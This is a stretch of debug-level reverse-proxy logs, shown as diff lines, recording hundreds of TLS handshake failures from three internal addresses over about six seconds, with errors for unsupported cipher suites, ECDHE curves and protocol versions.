+time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:49407: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:35380: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:58884: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:59827: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:47253: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:57302: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:9931: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:17475: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:51048: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:27147: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:21178: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:14007: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:1559: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:56057: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:63248: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:47391: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:11900: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:38378: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:60471: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:11344: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:51819: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:26759: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:1378: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:56024: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:53130: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:12268: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:34693: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:38685: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:45978: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:46829: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:47254: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:1981: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:53913: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.0.129:48069: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.0.0.4:39867: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:29456: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:24899: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:64236: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:49120: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:16491: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:8889: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:10518: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:2140: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:7017: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:36555: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:23829: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:53509: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:53Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:53Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:53Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:62338: tls: no ECDHE curve supported by both client and server" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:11985: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:13533: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:24003: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:34487: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:1300: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:49009: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:63097: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:25313: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:18042: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:30725: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:53951: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:48956: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:31821: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:3049: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:41679: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:10320: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:48693: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:39888: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:36414: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:44986: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:59063: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:3556: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:38206: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:58743: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:63477: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:59127: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:63528: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:50085: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:16884: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:31791: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:38061: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:36833: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:64431: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:28767: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:2221: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:43245: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:55847: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:24937: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:25029: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:10109: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:37732: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:57258: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:45387: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:18250: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:18980: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:19159: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.1.1:62966: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:5749: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:40355: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:31118: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:53760: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:53896: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:17600: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:14175: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:26683: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:61565: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:61900: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:16461: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:31868: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:24559: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:18515: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:34511: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:41096: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:15446: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:60571: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:20530: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:21963: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:5573: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:22524: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:25824: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:1832: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:47319: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:50865: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:43847: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:44729: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:27959: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:8217: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:37313: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:41778: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.0.0.4:20338: tls: client offered only unsupported versions: [301]" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:7035: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:3192: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:13069: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:10301: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:60173: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:58159: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:2762: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:10403: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:51223: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:50210: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:43976: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:1516: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:31757: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:29889: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:37214: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:11023: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:38875: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:59709: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:16058: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:24453: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:18100: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:14076: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:22130: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:56748: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:65309: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:60449: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:21851: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:52019: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:7928: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:10542: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:11708: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:61768: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.1.1:50463: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:8104: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:56Z" level=debug msg="http: TLS handshake error from 10.0.0.4:9702: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:62079: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:58481: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:39668: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:17318: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:24434: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:42292: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:2343: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:46641: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:47263: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:33769: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:22381: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:23192: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:2745: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:32623: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:8334: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:5401: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:9563: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:14110: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:10903: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:50563: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:11680: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:14181: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:28783: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:29328: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:34621: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:59453: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:47646: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:61581: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:21642: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:49964: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:47500: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.0.129:27831: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:43531: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:21551: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:28520: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:32535: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:51427: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:26353: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:8838: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:11483: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:26959: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:30092: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:20593: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:58819: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:30219: tls: client offered only unsupported versions: []" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:22981: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:57267: tls: client offered only unsupported versions: [302 301]" 